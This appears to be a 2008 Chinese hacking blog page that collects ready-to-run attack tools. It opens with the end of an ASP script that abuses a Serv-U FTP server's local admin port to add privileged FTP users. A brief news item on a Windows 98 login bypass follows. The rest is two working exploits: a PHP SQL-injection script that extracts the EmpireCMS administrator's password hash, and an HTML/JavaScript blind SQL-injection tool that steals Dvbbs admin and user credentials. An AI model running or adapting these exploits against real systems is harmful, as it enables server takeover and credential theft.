newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & "  DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
        "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=" & privilege  & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
    '--------
    'On Error Resume Next
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
    xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
    Set xPost =nothing
    response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &"</div>"
  elseif request.Form("radiobutton") = "del" Then

    loginuser = "User " & user & vbCrLf
    loginpass = "Pass " & pass & vbCrLf
    mt = "SITE MAINTENANCE" & vbCrLf
    deluser =  "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
    quit = "QUIT" & vbCrLf
    Set xPost3 = CreateObject("MSXML2.XMLHTTP")
    xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
    xPost3.Send loginuser & loginpass & mt & deluser & quit
    Set xPOST3=nothing
    response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &" have deleted</div>"
  else
    response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
  end if

%>

Tags - servu , 提权漏洞

Windows 98 登录饶过漏洞,类似以前的输入法漏洞

Thu, 02 Oct 2008 10:19:27 +0800

来源：cnBeta

虽然Windows98使用的人数已经比Linux的桌面用户都要少了,但黑客们捉虫的工作依然在有条不紊地进行中.
一个类似于Windows 2000著名输入法漏洞的Win98登录漏洞刚刚出现,它同样是采用了hlp文件中调用的explorer实现.针对此漏洞,群众们纷纷表示影响不大

Tags - windows , 98 , 登录饶过漏洞

EmpireCMS47 sqlinject

Thu, 02 Oct 2008 10:14:42 +0800

<?php
print_r("
+------------------------------------------------------------------+
Exploit For EmpireCMS47
Just work as php>=5&mysql>=4.1
BY  t00ls.net
+------------------------------------------------------------------+
");

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path \n";
echo "host:      target server \n";
echo "path:      path to EmpireCMS47\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where

userid=1),'',1,'1111',0,0,'')/*";
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($data)."\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .=$data;
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!\r\n";
echo "[+]sending data now……\r\n";
fputs($ock,$message);
@$resp ='';
while ($ock && !feof($ock))
$resp .= fread($ock, 1024);

echo $resp;

echo "[+]done!\r\n";
echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash,good luck"
?>

Tags - empirecms47 , ecms , 帝国cms , 注入漏洞 , exp

Dvbbs·php Version 2.0++ Blind SQL Injection

Thu, 02 Oct 2008 10:12:24 +0800

<html>
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit  -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/

function myrefresh()
{
window.location.reload();
}
function makewhat(x){
var whereto=new Array(2)//新建一个数组，项数为第一个下拉列表的项数
for(i=0;i<2;i++)//循环第一个下拉列表的项数那么多次
whereto[i]=new Array();//子循环
//下面是给每个循环赋值
whereto[0][0]=new Option("后台密码","0");
whereto[0][1]=new Option("后台用户名","1");
whereto[0][2]=new Option("关联前台用户名","2");
whereto[1][0]=new Option("前台密码","3");
whereto[1][1]=new Option("前台用户名","4");
var what=document.form.what;//方便引用
for(m=what.options.length-1;m>0;m--)
//这个要看清楚,因为要重新填充下拉列表的话必须先清除里面原有的项,清除和增加当然是有区别的了,所以用递减
what.options[m]=null;//将该项设置为空,也就等于清除了
for(j=0;j<whereto[x].length;j++){//这个循环是填充下拉列表
what.options[j]=new Option(whereto[x][j].text,whereto[x][j].value)
//注意上面这据,列表的当前项等于新项(数组对象的x,j项的文本为文本，)
}
what.options[0].selected=true;//设置被选中的初始值
}
function submitForm(){
if (pass!=""){
alert("please refresh this page and try again!");
setTimeout('myrefresh()',1000);
return false;
}
var host= document.getElementById("host").value;
var userid = document.getElementById("userid").value;
//后台
if(document.form.where.value==0){
var params ="?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/id="+userid;
}else{
//前台
var params ="?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_user/**/where/**/userid="+userid;}
var url = host+"/topicother.php"+params;
document.getElementById("md5hash").innerHTML = "Exploiting, Please Wait..";
var p="temp";
var w=document.form.what.value;
alert('Now begin to exploit!');
sendCall('1','48',url,w,p);
}
</script>
</head>
<body>
<font color=#CC0000>-Dvbbs·php Version 2.0++  Blind SQL Injection Exploit -</font>
<p><p>
<form name="form" action="" method="post">
<TABLE>
<TR>
<TD>host</TD>
<TD><INPUT TYPE="text" NAME="host" id="host" value="http://www.t00ls.net" size="30px">(URL to Dvbbs Php Forum Site: http://www.t00ls.net/bbs)</TD>
</TR>
<TR>
<TD>userid</TD>
<TD><INPUT TYPE="text" NAME="userid" id="userid" value=1 size="30px">(UserID of the user you want to get the information)</TD>
</TR>
<TR>
<TD>where</TD>
<TD>
<select name="where" size="1" onchange="makewhat(options.selectedIndex)">
<option value="0" selected>后台</option>
<option value="1">前台</option>
</select>(front or back)
</TD>
</TR>
<TR>
<TD>what</TD>
<TD>
<select name="what">
<option value="0">后台密码</option>
<option value="1">后台用户名</option>
<option value="2">关联前台用户名</option>
</select>(what do you need,don't support Chinese username)
</TD>
</TR>
<TR>
<TD>
</TD>
<TD>
<INPUT TYPE="button" name="submit" value="Exploit" onclick="submitForm();"></TD>
</TR>
</TABLE>
</form>
<div><font color=red><B>Output (whole username or MD5 Hash of password):</B></font><span id="md5hash"></span></div>
<hr>
Browser support: [IE7.0|IE6.0] [FF2.0]
<p>
Coded by T00LS.NET
<script language="javascript">
var xmlHttp;
var pass;
pass="";
function sendCall(i,j,url,w,p) {
if (p=="temp"){p=url}
//以下用户名暂不支持中文...
//后台密码、用户名、关联的前台用户名
switch(parseInt(w)){
case 0:url = p+"/**/and/**/ascii(mid(password,"+i+",1))="+j+")/**/";break;
case 1:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
case 2:url = p+"/**/and/**/ascii(mid(adduser,"+i+",1))="+j+")/**/";break;
//前台密码、用户名
case 3:url = p+"/**/and/**/ascii(mid(userpassword,"+i+",1))="+j+")/**/";break;
case 4:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
}
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
//解决FF中跨域问题
try{
netscape.security.PrivilegeManager.enablePrivilege( "UniversalBrowserRead ");
}   catch   (e)   {
alert( "Permission   UniversalBrowserRead   denied. ");
}
}
xmlHttp.onreadystatechange = function() {
if(xmlHttp.readyState == 4 && xmlHttp.status ==200) {
var str = xmlHttp.responseText;
//alert(str);
var md5hash=document.getElementById("md5hash");
//if(str.match(/\u8bf7\u767b\u9646\u540e\u64cd\u4f5c/)) {
if(!str.match(/\u672c\u6d3b\u52a8\u62a5\u540d\u4eba\u6570\u5df2\u6ee1/)) {
pass += String.fromCharCode(j);
md5hash.innerHTML = pass;
j = 48;
i++;
}
//如果检测用户名，直接使用else {j++; }
else {
if(j == 59&&(parseInt(w)==0||parseInt(w)==3)) { j = 96; }
else { j++; }
}

if(pass.length >= 16) { alert("Exploitation Successfull!. Admin MD5 Hash(or username): "+pass); return true; }
sendCall(i,j,url,w,p);
}
}
xmlHttp.open('GET', url, true);
//xmlHttp.setrequestheader('Content-Type','text/html; encoding=gb2312');
//xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(null);
}
</script>
</body>
</html>

Tags - dvbbs , php版 , 注入漏洞 , exp